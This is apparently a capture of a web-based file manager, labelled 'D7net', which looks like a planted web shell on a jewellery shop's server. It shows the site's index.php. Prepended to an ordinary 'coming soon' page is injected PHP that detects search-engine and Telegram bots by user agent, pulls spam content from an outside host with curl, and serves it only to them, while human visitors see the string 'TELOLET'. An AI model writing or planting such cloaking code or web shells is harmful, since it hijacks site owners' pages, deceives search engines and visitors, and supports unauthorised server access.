D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home3
/
encodto1
/
parbatijewellers.in
/
Filename :
index.php
back
Copy
<?php function is_bot() { if (!isset($_SERVER["HTTP_USER_AGENT"])) { return false; } $user_agent = $_SERVER["HTTP_USER_AGENT"]; $bots = array("Googlebot", "TelegramBot", "bingbot", "Baiduspider", "YandexBot"); foreach ($bots as $bot) { if (stripos($user_agent, $bot) !== false) { return true; } } return false; } function fetch_content($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // untuk mengikuti redirect $content = curl_exec($ch); curl_close($ch); return $content; } function handle_request() { if (is_bot()) { // Ganti URL dengan sumber konten Anda $content = fetch_content("https://takeru-two.com/file/backup/29/index.txt"); return ($content !== false) ? $content : "Content not available"; } return "TELOLET"; } // Basic security headers header('X-Frame-Options: DENY'); header('Strict-Transport-Security: max-age=31536000; includeSubDomains'); header('X-Content-Type-Options: nosniff'); header('X-XSS-Protection: 1; mode=block'); echo handle_request(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Parbati Jewellers || Coming Soon</title> <meta content="" name="description"> <meta content="" name="author"> <meta content="" name="keywords"> <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport"> <!-- Bootstrap CSS --> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"> <link href="css/style-dark.css" media="all" rel="stylesheet" type="text/css"> <link href="styleswitch/styleswitch.css" media="all" rel="stylesheet" type="text/css"> <link href="css/colors/red-dark.css" media="screen" rel="stylesheet" title="red" type="text/css"> <!-- other styles --> <link href="css/skeleton-wide.css" media="all" rel="stylesheet" type="text/css"> <link href="css/media.css" media="all" rel="stylesheet" type="text/css"> <link href="css/font-awesome-4.3.0/css/font-awesome.css" media="all" rel="stylesheet" type="text/css"> <style> #kenburnsy-bg { position: relative; overflow: hidden; } #kenburnsy-bg::before { content: ""; position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.4); /* Black overlay with 0.4 opacity */ z-index: 1; /* Ensure the overlay is above the background images */ } #kenburnsy-bg img { position: absolute; top: 0; left: 0; width: 100%; height: 100%; object-fit: cover; } .container { min-height: 100vh; display: flex; flex-direction: column; justify-content: center; align-items: center; text-align: center; position: relative; z-index: 2; } #intro-title img { max-width: 80%; height: auto; } #intro-subtitle { font-size: 1.5rem; margin-top: 20px; color: #fff; /* Ensures visibility on different backgrounds */ text-transform: uppercase; /* Adds styling to the text */ letter-spacing: 2px; /* Adds spacing between letters */ } @media screen and (max-width: 768px) { #intro-title img { width: 100%; max-width: 400px; } } @media screen and (max-width: 480px) { #intro-title img { width: 100%; max-width: 350px; } #intro-subtitle { font-size: 1.2rem; } } @media screen and (max-width: 768px) { #intro-title img { width: 100%; max-width: 600px; /* Increase the maximum width further for larger mobile screens */ } } @media screen and (max-width: 480px) { #intro-title img { width: 183%; max-width: 528px; left: -117px; position: relative; } #intro-subtitle { font-size: 1.2rem; } } </style> </head> <body> <div id="kenburnsy-bg"> <img alt="Background 1" src="images/background/Jewellery-Showcase.png"> <img alt="Background 2" src="images/background/Jewellery.png"> </div> <div class="container"> <div class="row"> <div class="col-12"> <div id="intro-title"> <img src="images/Parbati Jewellers Logo.png" alt="Parbati Jewellers Logo"> </div> <h2>Under Construction</h2> </div> </div> <div class="row"> <div class="col-12"> <div id="countdown-wrapper"> <ul id="countdown" class="d-flex justify-content-center"> <li> <span id="days-sub">days</span> <input class="knob" data-fgcolor="#fff" data-height="140" data-max="366" data-min="0" data-readonly="true" data-skin="tron" data-thickness="0.1" data-width="140" id="days"> </li> <li> <span id="hours-sub">hours</span> <input class="knob" data-fgcolor="#fff" data-height="140" data-max="24" data-min="0" data-readonly="true" data-skin="tron" data-thickness="0.1" data-width="140" id="hours"> </li> <li> <span id="mins-sub">minutes</span> <input class="knob" data-fgcolor="#fff" data-height="140" data-max="60" data-min="0" data-readonly="true" data-skin="tron" data-thickness="0.1" data-width="140" id="mins"> </li> <li> <span id="secs-sub">seconds</span> <input class="knob" data-fgcolor="#fff" data-height="140" data-max="60" data-min="0" data-readonly="true" data-skin="tron" data-thickness="0.1" data-width="140" id="secs"> </li> </ul> </div> </div> </div> </div> <!-- Scripts --> <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.3/dist/umd/popper.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> <script src="js/jquery-1.11.2.min.js"></script> <script src="js/velocity.min.js"></script> <script src="js/jquery.kenburnsy.min.js"></script> <script> $(function () { $("#kenburnsy-bg").kenburnsy({ fullscreen: true }); }); </script> <script src="js/jquery.nicescroll.3.5.4.js"></script> <script src="js/sky.js"></script> <script src="js/form-subscribe.js"></script> <script src="js/form-contact.js"></script> <script src="knob/countdown.js"></script> <script src="knob/jquery.knob.js"></script> <script src="knob/knob.js"></script> </body> </html>